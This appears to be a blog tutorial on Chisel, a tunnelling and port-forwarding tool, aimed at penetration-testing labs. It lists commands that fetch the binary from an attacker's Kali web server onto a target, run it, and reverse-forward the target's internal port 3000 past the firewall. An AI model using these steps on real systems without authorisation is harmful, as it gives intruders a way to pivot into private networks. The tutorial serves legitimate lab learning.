CHISEL_

Chisel Full Tutorial | Updated 2024

Introduction

In this post, You will learn what is chisel and how the chisel tool works. Also I have mentioned about the commands and below is the video format of the post, Check it out

Video

What is Chisel ❓

Chisel is one of the powerful tools for port forwarding and tunnelling, Which is written in Go lang.

Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.

Also, The chisel tool is widely used for port forwarding.

Forwarding a localhost IP from target machine to our machine is the simplest explanation for port forwarding.

Take a look at the below image on how the chisel tool works.

Who Developed the Chisel Tool

The tool was developed by Jaime Pillora, He is an Australian and I can tell that this guy is really go at the Go Lang.

How to Install Chisel

Find your machine OS and the target OS architecture and then go to chisel release. Choose and download what suits you.

Extract it and you can now send to the target and run the chisel.

Linux: sudo apt-get install chisel
Win: Manual installation by downloading the file

Features in Chisel

  • Tunneling
  • Firewall Bypass
  • Secure Communication
  • Single Executable
  • Cross-Platform
  • Dynamic Port Forwarding
  • Configuration Flexibility

Advertisement

How to use Chisel

Follow every example carefully by end of thispost you will be very familiar with the tool and if you continuously work for 2 -4 hrs you will become a pro.

Work hard until you reach your goal let’s make hand’s wet ????

BY STUPID ME ????

Step 1

Open your kali machine and start chisel on a port.

chisel server --port <port no> --reverse

Step 2

On the target system upload the chisel using the below command. And make sure you have started the python server.

python3 -m http.server 80 (On kali machine)
wget http://kali Ip or tun0 IP/chisel (On target machine)
chisel

Step 3

Now, let’s start the chisel on the client side and forward to kali machine. Before that to check what all the IP locally running in target system you can enter the below command and check.

netstat -antp
chmod + chisel

Make sure you elevate the privilege.

./chisel client 10.10.16.54:9999 R:3000:127.0.0.1:3000
chisel

Step 4

We have successfully forwarded the localhost from target machine to kali. To view it let’s visit 127.0.0.1:3000

chisel

Conclusion

Chisel is one of the most versatile tools I have come across. It’s the best tool for tunnelling and port forwarding.

Hope you like the post, See you in the next post ❤️


Also Read: Naabu Full Tutorial

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site

 

Scroll to Top